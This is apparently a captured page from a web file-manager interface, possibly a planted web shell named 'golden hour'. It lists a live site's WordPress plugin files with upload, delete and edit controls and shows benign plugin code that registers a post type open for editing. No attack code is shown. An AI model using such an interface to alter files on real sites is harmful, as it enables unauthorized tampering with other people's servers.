golden hour
/home/godaofbq/besthyperbaric.com/wp-content/plugins/oxygen/plugin/blocks
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
420 B
Del
OK
ajax_load_blocks.php
1.97 KB
Del
OK
ajax_save_block.php
5.51 KB
Del
OK
base.php
220 B
Del
OK
block-shortcode.php
560 B
Del
OK
block.cpt.php
679 B
Del
OK
Edit: block.cpt.php
<?php namespace Breakdance\Blocks; use function Breakdance\Themeless\getTemplateCptsSharedArgs; use function Breakdance\BreakdanceOxygen\Strings\__bdox; /** * @return void */ function register_post_type() { \register_post_type( BREAKDANCE_BLOCK_POST_TYPE, array_merge( [ 'labels' => [ 'name' => __bdox('global_blocks'), 'singular_name' => __bdox('global_block'), ], ], getTemplateCptsSharedArgs() ) ); \Breakdance\Util\disable_publishing_options_and_attributes_metabox_and_force_status_to_publish(BREAKDANCE_BLOCK_POST_TYPE); }
Save